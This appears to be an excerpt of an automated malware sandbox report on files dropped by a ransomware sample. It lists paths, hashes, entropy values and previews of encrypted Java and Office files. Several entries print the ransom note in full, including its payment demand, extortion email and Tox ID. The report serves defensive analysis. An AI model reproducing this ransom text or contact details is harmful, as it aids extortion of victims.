                                SHA1:535DED448C7759FDA1BAE748C16D8C6661B839BF
                                SHA-256:31A8A50E7E9A203ED3DB70E94E3BC1F3D07CCB42D0A86BBF292251D6137ADE5E
                                SHA-512:BE8284A1D98D41CB5243CC32A5BD112258FE61EBD183253E4BF648976EEFB342A7639A8F2D71CE53070133DC3BE1936A0FF9AD159814695857FF9E88F7FD2664
                                Malicious:false
                                Preview:.~.../.tZ+...Q..&.o.j..........;..x7.G.K.l.6......QL..@....F.R..B-.*....9...*.K..w..@...t<5....8E...W...6.J.F.~e`..Zi".`.4g:D+.unlKs.@5.B(z......N(....c.g....|T4.{i.`2).|....C.m.;.u..#......G...%...j.X..j.4Q.dL.a.&L............ $....ee.L..6:.tO.P.......+..pA..aOd.L.8..y....:Y....-.W...4{...E0..e....^..Uf0...5...W.....{...;. /.;..6....YT.%*.=.C.7.5x>..;.L.2.:.z.z.E..@.2....j....yX.?.o.....Bl>.JH[.d.xO...LQ......K..x.KS..hJ........z..K...t..@.v.......W};.}`...YrR...........L...d;..~u./H.OkT<561?.'.._......d FN.,.:.k.D..L..7..Th.z6w..m "..g.:r...+W..7zi..>.. s.u).'#GVl.O..0.e..T..3.............9.S.U]~..R.......b.\.RP..o3o..A.T.[1....vM.F..S..`c.30../......z..F...b(..6..L.Pa.....y...*tU.(.j.L..Q.)...H..G..q\...e]..8.6..w..Fz52.Q?.8v....cSAq...$..66..G!...=.8i0Kr..>.0......Q..V....Y.....!Q.:.m....efi.[...>=.*..../..."...~|.k.;.Z.7..]|6..f....3.w...e.E*Gb.[..g.M.H...!.<z.Di2}.2...z..\..%r.^./.j.4$....T.xo.......X.).ge...;Ky43..2...{.V/.e&G.%m....6..

                                C:\Program Files (x86)\Java\jre-1.8\lib\psfont.properties.ja

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3404
                                Entropy (8bit):7.9385087438793
                                Encrypted:false
                                SSDEEP:96:CxK4e0jT+EoTP1z9IqjPpbeNExpRRjd5Mic1mevuAVOb:qK4eCT+3TP1ZhpbeN4pPjwzm+VOb
                                MD5:4B7E66843B2838CAF18D58025363EE38
                                SHA1:5494F0DCDB3A54801CD18963CBCFFBDEA46F4EA4
                                SHA-256:6879F99E7CFB772D914C55BE74358E5F4E5BD2B26D5779DCD6BBFB28523AF679
                                SHA-512:34308D4511A2FCE5EAEC2FC59639981DFB474930A158CD81EF0CC7C3AA4EEAA19AA7CA5F0ED908991AB0FB8696993724BB22EAB7C97FF3702A773F799877EBD2
                                Malicious:false
                                Preview:.$Q....H%..6E.K.....9>..oahr...zk...1.n..m;`..ym......il..v....]z.m....&...J.@5..i...DrO.Tj.....'"......}...........M....$.%...."nw{...Z..x.W..+G....3R...<W.o..G@+*.........Q.qR-...oI.*...x];6%.j.J.......B..IY.Cnbq..;..Y*..O..]5.A..........q..b.//...zB+.zx...c..g..........Lh.6..]. .oyC..C3'.j....* `$&.L...u...OK.)h....nA+T(v.B.mB.....:...SWz.!..Lx...BR1..[5.[.{}..E#.]..B..a}........BbU..>K....v.!.V_=8^..:7|.j.X......:.VV4..>../..b.....W.^..=sM..1.X@cQS.eb........x.w.....#..q.5..z=........%...6.h.M.....5.F-.z...s;....~(.S.........p..@f.]}......K.Oy..e..Es.....>@!9.e......lr../..8.....z..0}w.Af+nf.".C. I.#6.v.p...*....q........l".ei....d .-.^..Uh......%....F.<.gq.sc..0........XL.=.r!.R.+.i..x..._...s.X..B.!>`.4.....X$............Z.......$.?...6..2....,Fe.v....,....f..`......9.#.p....T@13...F....y.B....9....^,p...C.7..B}!*C......6....Q..(N.)Z..(.e ...K.3..>..J..r..'...v..#..7..5...0.r.>.a.......@!..z..~C.X.5.)Y.V....c......Z.Jp.o..q.o

                                C:\Program Files (x86)\Java\jre-1.8\lib\psfontj2d.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11001
                                Entropy (8bit):7.980715298963405
                                Encrypted:false
                                SSDEEP:192:e+RVzkU8d4lW3AW13V2UnVbZnh8xgQOWXAkQ+f7eNjZ7RqbTWx/+VOh:xCgAZ131VNh8yL1kQ+fihZ7kbC+VOh
                                MD5:3ED512D3C876C7BE8568373149A483C0
                                SHA1:20B1D3527E9D5132A832788D9917B801A6A67FA0
                                SHA-256:15A8C3A67411D4D0CC923DF7C2849BBAD416F6178E305F1691D80B90B51EA18F
                                SHA-512:CA752D6FE9E67F96156CC8EF1ADF410A81242D2B806F8616D0F1E287347F149E47B9FDA8E60DFE92C4643A0496A032A924B6874BA1291F07816A49CF10EC0890
                                Malicious:false
                                Preview:....";qr&..qD.=.se,4.......c...Z........j|hh.@...w..v.G.a ..A..:.gE...e.{...CpDHY..^'..S......AE....x}...q..C.CmK......$..M..vI.eC:y2/.f..`.^f]...>[o..,...Xba._.^..9"2.....Y.(.b.N.6..r..E..G...`,.(..}I..E#.....'.3N..o#..7.5ZN..kc..B..>...]M...|.i.s.+....b.4......./.o4...C....i-9@...-.....!?.S.T.....6X...e...Q...9..I....iC...w...~.....w.#N...u.R..."..}X....@'.;..c..s.x.J:.X.%.%.....IU.c..F^.sz......1b..hC....).R.).M...i.0<OV.Z...*.#.Te .sx....a.l.H...uA._:..Ws...U.....}..5.\...!.5.. x.(0.~{.^......]a..3d+g.<n.X..>...xcJp@.oG...-'......{C].T..."..j.a.......X^.,._....C.d.g.)b.a..&.=X........G...j.x...v Y.YU....&?.~OI.U...8.8Nq(.y$..J......E2.N......P.7........B..h.@.;^.j.gR.3..{...S...i*%.]sw)..F...B.....J"'.pe.7...@...Y.....n...,3.Z9.mDPiC....B.>....+h.).......L.U...9N..{.y...?..........P..!b...j.,...m.w..e...:.%.{Pc.X.<...90.....b..B^].........4..tj..4.G.>A.G.BX.{.....s....Ex}..u....._./..oG.......u/5i...kL.0...i..G..0..?WA..~.%..M.>UY3....v.X...

                                C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3548406
                                Entropy (8bit):6.798143809423666
                                Encrypted:false
                                SSDEEP:49152:+4zJYGPpxjOBAS++jqWr739qhgO587exNJrGAhiDwthCHJu9r2JcaD4oc2HmtjLS:+b19T1P2YqSKlOeu
                                MD5:25A311C95078B93CC42F6531D3A612A1
                                SHA1:00DABEB03D68B501CBCD2EB7A8ADD4ABEE9C7FF1
                                SHA-256:84FA49B89AAB47DC8B3469F4B3693A6EA9D6CC7D81EB4B643D70E922E5B7E5DA
                                SHA-512:F16E3950475A374C6C938523CDAFBCB288F082A38E5BA17C11898251713D4F18C2A433DC0B963E47863BD814DC74D38FAED358366CF5CA99A009EE5AAC3A760D
                                Malicious:false
                                Preview:G..jd. ...'..Ou...-.....S.c..YW.#..t....E....Y..+8..."..@=>k.OJ..V."..H.......z.....6.{e...X......M..U...T.JO...v"....Nm.H..a...g......g{...1L.Ea.\.......hd....6.a..^.*q..Ot.......DS.s.n.Zw.T.e...I....bp.......u..t.Y..5..$...i....7..7..L~t.k/>2._....,=..c.V..L..^...Z..[*.F7..C.....)..]6`d;W......F....*..>.B#..u)^..dG....V....0...."..@..^..Y.<..../Xk.qb..Jd....w...*...j.`dw..L5....I?.....sSY..^[8..O..w.]B...N..x..............\....T4...k.L2..<. .C{...y\rO....Q..fk..CM.z...l.E....'...;.L'.v.X..Y*R`<..Hl.{.....5.oZ..n9v.kd....wQ....,[..G..L.{.Q=.`;...Y`3.X...(#.%..P....b..G...7g..~.H.x.L.....eL].'..]......62.R.n%.(.....kP. ..P....&J.M.'8<..#.l..x0._.RN....3.TE...xz............J2..L).H...o.._.t^r.ca\.v.{.'. .:9nt1F.~.p...t>N.....u]fZ.=....I..zbVu=__.z..9...l..;QE...Gi...Mp.s%.Ht.lD....2.....v.al...ROAB.".S..+...p.z..+\K........E)..g=..y..e....+&.......a.&.in....w..n.v...9z.[..5...R.=./O..*...g...[.-..(.kp...|=B..l_..Z...w..n8$.P.{.4.=5i...}^. ..Ht

                                C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):55854590
                                Entropy (8bit):6.820564324964731
                                Encrypted:false
                                SSDEEP:786432:9zSLP+/BSlfldU/7GGmAhAIQ9r5t2UQ6q6px4bx:lIP+6U/7GFAdrx
                                MD5:869B1F15E03E8EDD404CCAEC44BCBA87
                                SHA1:6C0890CFEF4731FA1EA2B8AF0F5F7F6DDFDA9BD8
                                SHA-256:C4B4BEEC90E7FB6C2836777BBC01B7DEE0F69E4D229B5B1A98064BEFE569D2C8
                                SHA-512:03C7B53CF5F54141A931DDDFD4B2FAA59A6490F811EAD4949EBA75FC10504316DF90D52396F5073DB3B16A7F3C3FE134ABF3FEDCC54B547BA45764A9874992B2
                                Malicious:false
                                Preview:.u%..T. ...X.t.g.g7J..hG......3.}.O@.bH..\.Y....!.\....m..b.z3G............a.\.+..x..C...3s...U..z....;.Flt.....7.._..c..].^/.c..m.;0.........?..:.o...@....u...g.Gw.w.x....[..!..5..b.....3.Q..c.`....wjWJ.B.........K...Fj\t....L..m;..fG...8...Q..~^4...h|.....A@~.).. Z...~.c!.......cV..V..F...:Q/......tf.|>0.....Q.p)...l.....U..9(.....q..pM...z.Z.F-.{...m...5.RL...r.1....*...".5....R....N...ft.+.if.....uO.=.30....B../Z.....,.{]&..5.Y6q..a<..s.K...Pu..].....(.8.....o.c...r...;.....f..8XE..p..r.L}..u.1.7t.-..!'I...A..=....4NJ.r.&.J.o....\.}U>.80.e.*.#^i.c...IU...6x....?v....}...h.d.......&e.1..y.fls..q.F..~.%..s.u.c.......N..,..h;.n.+.y..7m.....l..s.;..@5$.P...<...w~w....'h.|\....%.|.:.....uN.....Wh{........o/....N.......G....,....,,.#..O..jv:Lr%..*v...?.s...Kt.U{.......#,3.Ax,..Z..=v..J.&R......Ky......?.^.+b'.}......g...S.F......<.w"[...$`.F['.e.......:..l..v.........Ot.%a.q:.!`.Q.}.h.)~....\E...=..y. .G.Z..KE.k..~(.....30..59<2

                                C:\Program Files (x86)\Java\jre-1.8\lib\security\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\lib\sound.properties

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1818
                                Entropy (8bit):7.8802743426051345
                                Encrypted:false
                                SSDEEP:48:YY7YuGUJ2ugW0O8Z6nhL/0X/WyYu+MAVMJg6Tc6:Y4YGMZy5/yevuAVOc6
                                MD5:79D70B8B66A730B1EE3B63A2C2F1CD7C
                                SHA1:2565559F82A98DA019593C7D614385D554D16DC9
                                SHA-256:BCBC2BB3D8BD42D717BB00BBB076F5CC1627AE0DE78F71D7B4C81A7FF5E38D7D
                                SHA-512:2235846324DF0B96F488B1B54D434533CAA4EC85981AC45664FA406B7B62CDE31A9D0CAC0C0B2E479EC691E6F6B5A4E254530945C59228DD80489CF98B990BF0
                                Malicious:false
                                Preview:.q...[.}':Y...*..y>...u......s7.F..(..OE..J..<..,..2..3..",.....w.....w.:X..WE.5&H=.2....>..X..I1g@..E<...R...y.j...!.2fL.......!...O....E<-C.,..S3.X\.j.|q.g..|...z...w.G:/...i..@......]..d....g..w.]...8..k.....h.uit...\........{.Xx..uq.MPp,.0...*%...TI f.q.|v6..PS....9.R..l^.b:..^&.6.?~J.kY../.....xBV...K..><.?.%=Z.........=..~.....f..........4.....yp..._Xo.....q.m.y..qQ..{.L*x..3.c.Z.Ol.F...<...r..0...`..7..(a...X....x.....`.....6P.)s..8.|.0.5.y..C`.5.uA`r.Q0......_b........\.>h.bZ8.f!}.....N...j..Dz.<.L.Si.V#.T......cX.a.E.q......*u.T....3.u.}.8. f.xE.V....U.X9,N..x._.8.F..E.......z..V.%.J...v.AR...0&#..cM...;...FL.g.5.a.*..O.}..\fU..%.[...|...R!^Lu.Z..DMW|...A..I.YA.L...k,.....Mc`.p..{.K{...I.i..t..5.dU....B..j;2..yk~w....N.A_.........9&.......w.g....k..5!"....T..Ny.........4....(...=..........J4Y.F.>c^..o..7.y.3x.n.'c..p.}_^.F..z....0g...l...T.4g..X.@.. ...m.....t9.. ..........#....8.-...)....6.RbFf.G..I.F8.I...)TK..t..:....5.2.

                                C:\Program Files (x86)\Java\jre-1.8\lib\tzdb.dat

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):104393
                                Entropy (8bit):7.9983503100924604
                                Encrypted:true
                                SSDEEP:3072:JqMW1NVo9+bv/m5hc/N0j+uINdBz/RCRplclIOPeL3:It13MYv/JN0qVaOPm3
                                MD5:2CADB11EA3B61985BE6A61D9C3F1E877
                                SHA1:4BAFE242019826DFA83D6A8E254CFA89D88BE65D
                                SHA-256:A8276D7300997C5E99FD732ADEE53614ED65054B493C2935BBE21F02826470F7
                                SHA-512:952AF17E65B45E28706E0504CEACAB354A2F2C60EC5C9A4C004546A45E8E48175E760BCC8C0483F09A970F73CDE80126A606524B3A1D915B9DD4C92C07DB4119
                                Malicious:true
                                Preview:... .(-......I..C.........s..y:....y.E..a......p...Ga..)....8Xp...f..h...v.....~Y..e....=..c....O...K..`}..9.h..6.o.[.../-..E.t4s/...W.....p...e.}.....z|.Y...K.c....^.V...eA?OG........j.~....BS"..\V*...@.dr.C.....=.....vi.Ue ...UU.'.%.,...H>..'.7^.?W...6....7..=..Y........L....0O..q`v.v.y.t....^P..+.Yo..WR..E.Fm\.....&s..@.s.=..z..m..D.\.z....|8..<oK..<...j..._3.@...u.wo.P....u..P....(..(...S....<....P..tR).........H..X.<..9@......E.J..%+........U.....o.%KB.m.[v39..`3..3K".q.a..`]....<...W.....l...2..]...".pw.f...Z.....@..5..'...A..i...Q.P.%.....W-.^.4.6[...-zhK.hT....e.....jC.F~l..J......L.~.....*.pzU...MP...m.>...Y.'f..wk.i.).T...JN.!.5...R.c..j.+.Ad-.<U..,..."o..h8q....f..5.....{I..n....W.....8....V<c..|....w.~..OX..I4.~..)...u{.k..9...[...iTAu.j....*...l..3.$....I.h4.[..r.O3.Q..\...E....D.#.u.M..O...s.8.(..S.@-....3..;.....`.tk.q..Yi...d..Q].v....n..M..h.....E=.+...X.U.L....j..7..&D.>.;..2.B,$P.8@...F~n.!5...q(.....;:Su.d.U.....

                                C:\Program Files (x86)\Java\jre-1.8\lib\tzmappings

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10185
                                Entropy (8bit):7.979443429815771
                                Encrypted:false
                                SSDEEP:192:dPNgptijU5m2I1XFUipy5uj4itteg3WA7lQm0qcCjk9GgG4ZgiH2ZOrlxN+VOCk:dPwtRTI4aygj4ibm4lQmgCjzgG4ZgiHF
                                MD5:C4991D942E9BFD2F3A5EF0CABA9A3939
                                SHA1:11130913927AA9838276DEA9CA1CF9FF979640DC
                                SHA-256:262A6BF82769A0E9DC1CA074968AEA74B12B467DFA589C36F83EABDA47AB4109
                                SHA-512:B2646DED61A0DFAA86FD41A26CA0DFCA9DB0546E504C1E92061A5983141C05B95EE811B0855B4C1FDF668CE57DFFED2C3DAF5960DE8EBF09C9120D6163D2CC7E
                                Malicious:false
                                Preview:2.U?.... thx....f..U.AT.....=c.x.....$...b`....x:Nf.pa.EAE......X...o.....#W....XQb5T`....0HaP..F........,R=..b.<..[..,.'&.Y8.:....W..6....}..v.Ez...*.R.8 .0.!.N.=.dz..B@iiF..f.Y$.!m.U.*o.a.;.3Jn.C..N........Y...>U.);.....x.d...m..,s...{i.....:y_OE.....r..@.O.].D}N....9....1.=..?.}.6...T.&^.A.....>.J..m..y#v.V...U...R....).]..g.....S..!../..9.k.2.FV:..r$.<.J.o .p...c.<0.n...+.&..Q..yT..U.a.woU.b...).+..I.qZ.h0...V.zK.....?....0.Z.....4..pR=}lf..A..L.|....... ...K.5..t...!-.....X..z.....7..i...%s...].L...F.u.5.[.J..h...m..u.@>.....Z.......L.~W.qEm.]w.h".IK.S..I.0Z{.j..rK........]&.....e)...K..T..c+B.......T.I._.X..@....[Zy.s.....&v.........9-..3....=6...6.l...C.q...1Jj.=6.y...@......jL.2....v..h.N.....QvD.f.f....t.R.3g......-..(.....UMSZ^Y....s.W!....M.^..{...6..9...o..@U...5...}..K...%.._.....[5.....U.....3...#...*pnj5....u*..".....T.`...P%.gY..7.Qez.H.v\..i.c.9.l....3t.h.+.(=.........g"..<..+.).....6W.4P.:..M..5>T...+..v..t.d.. ..l.*..'.

                                C:\Program Files (x86)\MSECache\OfficeKMS\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\MSECache\OfficeKMS\kms_host.vbs

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):41900
                                Entropy (8bit):7.996471724365494
                                Encrypted:true
                                SSDEEP:768:oRhNucqUX4BY485ghCg8ub3igCLGw2zjg920xvJmc1Gd+SBkbguNtB:oRZlXh485ghzegC0gs0xvJnGxB0/
                                MD5:A15CA187BE4366D15C4BDA96B7ADBE16
                                SHA1:769CAB5AD42189790DCC5247B2224E2467097338
                                SHA-256:AB149892ECCEC18837C91F75E5D1ABE8210AB356248E4F86DFD08D78EFCB8691
                                SHA-512:AC3805D87C1737919F60D7D9ABD3A5A6CB39C3240477FA335BEA494B313BA68EFD5AB6D3343850A95F3DB243CF51F51F9E9899FC6FC0B775EB9AA3C566E8F450
                                Malicious:true
                                Preview:$.pW..P..jV [......A.8X..i......G.....I..(`.c.Pg 6..J87e..2...jw..h%.".e.x1..S.RD0.....9R.(..L/....k...^.U..i.....,8.x......~.p.f../....T.%(bNV..D%....pN$....n.G:Fs.R9c...h...W.Z.R 7.U.....e...'u9s..!...H...Hg.F.,.j.......b...."...PQ*d.>..D28\Ja.|........a$9[d@Q^....g5.3....-cx....F..P..ls...@tvm..H........R.!h...\v.I...2.U...U.....j.+:S..v....!.,.b)........e.;I..M.R..9....wL.~.N..n}.....oj>r..IV..7S.E3X..h.?..S...B..d.G$...v........Y...5...j...9.+.^+I....$.,../!..r....U.'.tU..x:.n....x..h..a.`..S~/I..X.Ko"...#.w..X".ArK.<.w.B.;x;...~.S./..;.G.....#@N=.u........d..i?O.[N(.$.....8.H.8..l/..HC.K.6.!W.h...x...h...D%......d.A.A...T.P..z.F.P.4-.5s.G.QR.4.......`..`YC..<...$WI....^....f8.S..Mx..[........Ox.-..b..:...0.ju.G"&Y.^.:...3.6...z).(..B.@t..m..Hq:...e#.B..i...Y}H@.v/.rn.n.IO7..t..Z.R..u.s..n..f`....S>....j.+D..k..d.."...;.,..G.....,....;..%..1.&.....{.q...eh..~..9.K.3.</.JFa..;m..b.i.q.{...^:.k..k.h...~...^a..Fj.v..*.T.)..?...l|.

                                C:\Program Files (x86)\MSECache\OfficeKMS\kms_host.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3853
                                Entropy (8bit):7.948437641226424
                                Encrypted:false
                                SSDEEP:96:MkG+vsghAhLdF8wDQeT+/G6e6bQ7jyvOqAevuAVOB:pkghkBF8IH6G6e6EsM+VOB
                                MD5:7A27801891A38F95361895D384360272
                                SHA1:F8E225FED54B8AE7B8813EE25000E010D90410B4
                                SHA-256:E84562CF35CCC3C16A2E228AF45E7159E5003E35A28645B4BCEB6E81C21F2F4B
                                SHA-512:2FF3386BBAACE820B3CDBF1E9CEFD009142B99F92B8294B81260542E84B344C739669629946D1E4CDB84F87CC03D1314D633187F9C54BB53DEB878F3AB907325
                                Malicious:false
                                Preview:.....4:.NPD.W.@+..~.35.,.>......i...U.*.d*...}I..j!3.n/..*I.-..?8......Lj..i.w.........!=.1..{..?...$..8y.8......T_..i`...7...=i...E.a....?.#.MR.%t....5.g.Z....fx.67X....r..6@l....a..O.q....U..YS.e.q.......50a....1..0X.......b.F.Z.........!..zl...9-|......U?....q.C.[........7.=...n.....;$....B..O...9..3I.p..kXH(....vrx.S...L....1.>.4Y...Jn....K...Z.....&P.N....W.%.n.'`.=...s..;...2dq/.,..'......'..#.".[...H!....tpEU.'............BI..S.G.Q....ue.... ..8-. ,.}.|......V2.....E}..o.....@..;....<.../?>.%.`.{!.@.I.,.....r"...iJ.F.8%3Lj3.,O V..Wn.+]...O?.T.H..../..Q...L=1n...J...$..,?......../~..W....0!).w'`y.i.VM..N....IU..#L.F.=...ZE0.e.X;....}.j.......[../|.R%.r..9..A....;7>..TS..3........j6..f...6....H..9.".J.+..IlT.g/...].....7L.-.#>....q..$..f.... ..".. ...x..nLr...s>On.....j...F3.....l...l;..55.-...T..1...D..:...MbP.o.fY.s.e..S.t...F....Eo..9..m...6.1T....I..FwDzQ.1.Y..cF|M&...J.n.....{...o..<h.)t:.|p.*hYn....1....d..t.....h4..9.>.

                                C:\Program Files (x86)\MSECache\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\AppXManifest.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5036392
                                Entropy (8bit):6.335390285867676
                                Encrypted:false
                                SSDEEP:49152:4d85mmw4RuS5cwD/Sh3NI3CUViwc83NIhvnCtd:4KMmw4EStbnfiTO
                                MD5:D221E3A6F4DE1D4A66FC15B259321A93
                                SHA1:8B275024F028460A06C05FDD1250A2DE905B7EC9
                                SHA-256:093AD744F51B3193E7F36D7306BE6AB0FC7AEF72410EBE8E9CA869C65173E7E6
                                SHA-512:A5AC548F998B87A0DDBC091CFF3A4FF361ACC34053B2C19DC168DBC76029E4D8E3BC363095C084AC5CE76BE58F0350B808B09BA7E5984F99F8BED15C2E409516
                                Malicious:false
                                Preview:?..._.o..(..<G.,....!L.=.S....P.....\r.j.v...e.@N..C.......>.6..a..g]..P=....*E....F,'..f.9...)........=b.e.>.L&..w....)......-......9P.D..G.......d;x..5....0!....s.5..AG"..9..K.:p.&....Ys..)...%{K........S.....<0P_.w..<......*......h..H>C..H........z.a..1.9..8..^..mi[..$...W.6)..2..0[H....c..7N....._.. .L..0...MC..w......C.&....(5.B..(e....o..}yF!%L...k..-.89.UI?<.En.M'...#.-.OH...zx.....}g...BP.wuO.......T...W".... 5.A...._.?.....@.*.'}..A<~.......|\.%/..2..%..m;...IO.&M.7`.W...3.;..K...<`}......w.;...w...8....@..0.....!.c......S....|."{-.@...G...BQ,!(!6K...J|r.m..g..@..f-..h....]..'q.f.....oKM.,.rw..|.?>......8.Zw.!.P.sA.X).1..C.k........:l.g....Y.'.2...m~ .*.$.O......'..V.V3...(V...P&T;<r. .Z.i+G..ay,$Kf...<<...z..,.......z...D2y.9.#.........s..\?..,rsS..x..f ......C.....R{.@....*..^3...c....M._.VBJ...r..^.a.j..o..}2@....6O0r.......}l..K......n %a.q8.t{.J...F.C....P..OQ.d......%.D...d-[.7......c...<2&....}..{,Uz...~._%^...4!.....b.H..z...

                                C:\Program Files (x86)\Microsoft Office\FileSystemMetadata.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):889
                                Entropy (8bit):7.698642389458632
                                Encrypted:false
                                SSDEEP:24:gDNsDP3EijbF3z/wpDyYPGTNj0hOHAVMJg6WXs9C27:INsDP3Eijx/WyYu+MAVMJg6TX
                                MD5:362E9AB21544B0AC4E68F5EA458433B2
                                SHA1:F070CB4F25F118D3ABDCBBDE9067749502E35A83
                                SHA-256:B138EFC0D4F2A440CB42D31AFD2A2CAE8A11C4BCD0C91A00BF630EDDA66552EA
                                SHA-512:5DCF96AA7A6ECB15103EC8AB25B010483A6992100096099600A691B53A086921CEB6FF1283950D0E1A5CAF8280F5C65A6CB191E2393AA63C06BA613470321659
                                Malicious:false
